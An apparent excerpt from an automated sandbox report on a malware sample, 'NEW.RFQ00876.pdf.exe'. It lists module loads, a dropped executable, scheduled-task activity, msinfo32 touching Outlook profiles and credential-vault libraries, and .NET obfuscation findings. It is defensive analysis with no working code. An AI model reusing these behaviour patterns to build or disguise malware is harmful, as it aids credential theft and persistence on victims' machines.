                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: NEW.RFQ00876.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: NEW.RFQ00876.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aegBDZrMeWOlT.exe, 00000018.00000000.1385687295.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538536765.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp
                Source: Binary string: wntdll.pdbUGP source: NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NEW.RFQ00876.pdf.exe, NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdbGCTL source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.cs .Net Code: T4R1qSirKvjZ8jPJXJU System.Reflection.Assembly.Load(byte[])
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.cs .Net Code: T4R1qSirKvjZ8jPJXJU System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07559638 pushad ; iretd 0_2_07559651
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_079DA7F8 pushad ; iretd 0_2_079DAF39
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE0EE0 push eax; iretd 0_2_07CE11C2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE17DF push ebx; iretd 0_2_07CE17E2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE1750 push ebx; iretd 0_2_07CE1752
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE1681 push ebx; iretd 0_2_07CE1682
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE16BB push ebx; iretd 0_2_07CE16C2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE16B8 push ebx; iretd 0_2_07CE16BA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE23EF pushad ; iretd 0_2_07CE23F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE2328 pushad ; iretd 0_2_07CE232A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE1299 push ecx; iretd 0_2_07CE129A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE22B3 pushad ; iretd 0_2_07CE22BA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE11E3 push eax; iretd 0_2_07CE11EA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CEE183 push eax; retf 0_2_07CEE1A9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE1150 push eax; iretd 0_2_07CE11C2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE8B2B pushfd ; iretd 0_2_07CE8B32
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE8B29 pushfd ; iretd 0_2_07CE8B2A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE8AD0 pushfd ; iretd 0_2_07CE8AD2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CE8A91 pushfd ; iretd 0_2_07CE8A92
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_07CEF8E0 push edi; iretd 0_2_07CEF8E6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDC48B pushad ; retf 300Ch 0_2_0CCDC4CA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCD34B9 push es; retf 000Ch 0_2_0CCD34BA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDC473 pushad ; retf 000Ch 0_2_0CCDC482
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDB5C3 push esi; retf 000Ch 0_2_0CCDB5CA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCD35D1 push es; retf 000Ch 0_2_0CCD35D2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDB5D3 push esi; retf 000Ch 0_2_0CCDB5F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCD4581 push cs; retf 000Ch 0_2_0CCD4582
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCD4508 push cs; retf 000Ch 0_2_0CCD450A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDB6B1 push edi; retf 000Ch 0_2_0CCDB6B2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDB631 push esi; retf 000Ch 0_2_0CCDB632
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Code function: 0_2_0CCDB741 push edi; retf 000Ch 0_2_0CCDB742
                Source: NEW.RFQ00876.pdf.exe Static PE information: section name: .text entropy: 7.711273899286818
                Source: RAangyFeHdZLco.exe.0.dr Static PE information: section name: .text entropy: 7.711273899286818
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, bmfDLjpuXXga1Np0I5.cs High entropy of concatenated method names: 'x2iXqUZG1G', 'LrHXAUdtYv', 'Ubv4uIi80r', 'Opw4vNwv6w', 'dECXiyMeUr', 'Hh3XOECnbc', 'lfKX1GPXia', 'y88XUQ6Vou', 'gpZXdRqY15', 'LU8X3Bu54q'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, sqSHy0TDxnUit1Vs6T.cs High entropy of concatenated method names: 'o34nDWFeG6', 'mnKnIshPkZ', 'W9dnHjvQM4', 'slUnPmG4an', 'ebLnNnLih4', 'g0rnS0Imkx', 'Q6UnjV0lik', 'AkEnW00net', 'ER0nK4PN2c', 'CSMnaHPffh'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, eg2N9YjocGCOskKUe5.cs High entropy of concatenated method names: 'TNXFxt632v', 'lroFQBRvEA', 'N16FsKmiBr', 'jQosAMk86v', 'RkOszCnoW7', 'w1HFupmEed', 'XoKFvckIiO', 'iuZFbb9pgc', 'c06FJaeUBQ', 'WPaF0Cvwg2'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, cgFh7tKE3LhbGRybWr.cs High entropy of concatenated method names: 'mrjFop23OO', 'WDHFG4ivDd', 'ILIFh0a1ZN', 'PqFFciJpMk', 'PfcFepcBEg', 'h1sFZfWYIu', 'OEDFtdFjYt', 'lQnF7XgUxi', 'JxRFLcktFL', 'WhgF2eqYHJ'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Hr7caELxU2fyHysv8H.cs High entropy of concatenated method names: 'pOWQcfe4LZ', 'YbvQZjebnD', 'r03Q7gQ0Uq', 'vhBQLfTlxU', 'hBtQ89lTZj', 'IKpQfxSZmr', 'dQ1QX9CNAE', 'mu9Q46bOrX', 'sf4QnwQNxM', 'otxQVkotb9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, OwWfsDyt1nsMMbKb4J.cs High entropy of concatenated method names: 'd8DXMv5lMO', 'SQwXmyoUvk', 'ToString', 'dSPXxyA76s', 'vJSXrOaYUe', 'iBYXQx6gJc', 'qBKXC51dJS', 'V11XshldkJ', 'z1lXFQrxif', 'BpnX9djIuw'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, TbPBtyAXJCZogp07Aj.cs High entropy of concatenated method names: 'ecqVQodPma', 'Aq0VCBKPC8', 'm4yVslvTeX', 'VuRVFPVgTW', 'xeRVnlx8mm', 'htRV9wGgmU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, QZgRRnzdnwFIMTT8ri.cs High entropy of concatenated method names: 'MWtVZTacaV', 'roEV7ahFS3', 'vOgVL6dAc4', 'sd3VDFLsCe', 'rbjVIknd2w', 'g6PVPlOALU', 'gGkVN4GDNh', 'iG9Vk0neWi', 'bcQVoHWroT', 'tVqVGlZurR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, lZQDKxbd8a3m5yw9bL.cs High entropy of concatenated method names: 'SENh4W9QR', 'fYxcg8RQg', 'rNIZTrZBw', 'NAjtTEBlZ', 'swgLGckJo', 'N4P2p242O', 'e7HhJGZ15M0k2YXFNl', 'lCPgJRTlIAQSU3eIFT', 'J824ykg3l', 'XpaVhE1F7'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.cs High entropy of concatenated method names: 'hA4JRhcqmu', 'P8RJxHTJRH', 'qCbJrw4ZrD', 'OeyJQvaDvK', 'NriJCaf6xy', 'oWNJsibvFu', 'KcbJFS36Yo', 'aw1J9dBjmr', 'gv2JYMnyVn', 'BXCJMQD0f1'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, ALXjfkrylHWxb186ed.cs High entropy of concatenated method names: 'Dispose', 'yXNvTN19Fm', 'hctbIse7g9', 'x17eQI355w', 'jpXvAYP6iE', 'wvvvzR4exR', 'ProcessDialogKey', 'fpnbuqSHy0', 'FxnbvUit1V', 'i6TbbybPBt'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, FS0OkP0e6k09q0CE9U.cs High entropy of concatenated method names: 'l4HvF87Xg7', 'cWFv9JPkXQ', 'vxUvM2fyHy', 'iv8vmHaEA2', 'Rtlv8NBi5K', 'TQCvfPn968', 'YJsfU548fWqkgMQl9R', 'D6eWfJv6rJRpHkqcjL', 'IuQvvc695b', 'APXvJyMcEl'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, FhKOe8wV3GXNN19Fms.cs High entropy of concatenated method names: 'RTwn8j2Wf2', 'lmFnXl6K6x', 'lnHnnXjLGp', 'NOfn6XgG1p', 'zYPnlMYpNE', 'VpenkdReHr', 'Dispose', 'XjU4x0K4S1', 'anE4rk4WaT', 'B2m4QJk4PH'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, NEA2ti2eZaBjydtlNB.cs High entropy of concatenated method names: 'Y1cCe5VBg3', 'uUjCtwDnGV', 'fd9QHmnfep', 'XiqQPFcw5p', 'tNPQNgoJ1Z', 'v8mQSuNMU7', 'PrEQjwgGmR', 'MWDQWrs9kB', 'zipQKWtWBx', 's91Qa2yx7R'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, RMB1Wp3sDbL6snkLuD.cs High entropy of concatenated method names: 'ToString', 'm0yfigQR4b', 'b3LfImuoG4', 'TIGfHMe8x1', 'Nn0fPtfFxV', 'JwQfNmwIMU', 'lMYfSGRKfA', 'LIofjrT2Ue', 'YvsfWFlMVh', 'pqOfKZIABX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, KXhWqrIFpC3aTyFrCv.cs High entropy of concatenated method names: 'TwNKhvufhLLHAAyKwce', 'pDoQXLuqLvAuUDTTjS3', 'txPs4faIKe', 'c9JsnDP08m', 'GPYsVOE5Qc', 'YVCatcuxWt9BmWEfrbU', 'QHdgkCuhS8nTcYwP1JR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, H87Xg77JWFJPkXQfOh.cs High entropy of concatenated method names: 'h9GrUbJS9U', 'KEZrd0hjgK', 'yc3r3kxX6D', 's09ryAq8eS', 'o9ur54gtjJ', 'HHDrp67Aes', 'EWUrwceUJf', 'HJdrqiWX1p', 'K4nrTaEEdg', 'kNSrALAfjB'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, fYM5l4vvPkQmv6DEe7j.cs High entropy of concatenated method names: 'wKEVAdqKQl', 'SNPVznf5ST', 'bIL6u0JCqZ', 'p2j6vkbRWb', 'A3w6bBw9Xe', 'FJF6JrUDbY', 'UFd60tONPV', 'gaM6RuLVJQ', 'uhb6xekieF', 'xLc6rPm3Gu'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, dnWL9Dv0TNdbK1I4b3U.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCcBnXIflm', 'EdZBV1jKJo', 'S3CB6SAcVF', 'txFBBFiQv4', 'DxOBlXDCQZ', 'OR4BEBOcVn', 'TjvBk8II90'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, ftiOZOvudvtoVZOhMnR.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EatVi6SCs2', 'qdfVOpY8nO', 'DLEV1mdc1B', 'ellVU8NnSm', 'PXDVdKGMvS', 'bJ7V3uwq9x', 'W5kVyS2pe4'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, O5KyQCDPn9681CloIh.cs High entropy of concatenated method names: 'E3ZsRGgE4w', 'nxJsraBc9w', 'EoMsC3tIgn', 'yvksF6mVxW', 'TrVs9kiNNt', 'rF1C5W0AoS', 'Ka3CpdD427', 'k7uCwxpoOV', 'IUbCqTROHb', 'M7kCT4Yba9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, cAQQjuUkVRdVJ9Gdhm.cs High entropy of concatenated method names: 'G908aZYuIq', 'LMm8OvhH1w', 'wW38UxqFoN', 'k748dnZbc2', 'GCC8IA8mfP', 'TtA8H38IgQ', 'RIb8Pksi9V', 'hUH8NaUmbC', 'U6c8SBybOA', 'BE08jsIfSX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, ovs4HF1taliex9VHSE.cs High entropy of concatenated method names: 'dCtg7C40Dq', 'xKogLPFdDA', 'A18gDguFcN', 'J1RgIOUroY', 'el4gPyepHM', 'WP4gNDymVD', 'nuOgj1Try0', 'Ip0gWQL3gO', 'dulgahnuYa', 'TZogiH8ScD'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, bmfDLjpuXXga1Np0I5.cs High entropy of concatenated method names: 'x2iXqUZG1G', 'LrHXAUdtYv', 'Ubv4uIi80r', 'Opw4vNwv6w', 'dECXiyMeUr', 'Hh3XOECnbc', 'lfKX1GPXia', 'y88XUQ6Vou', 'gpZXdRqY15', 'LU8X3Bu54q'
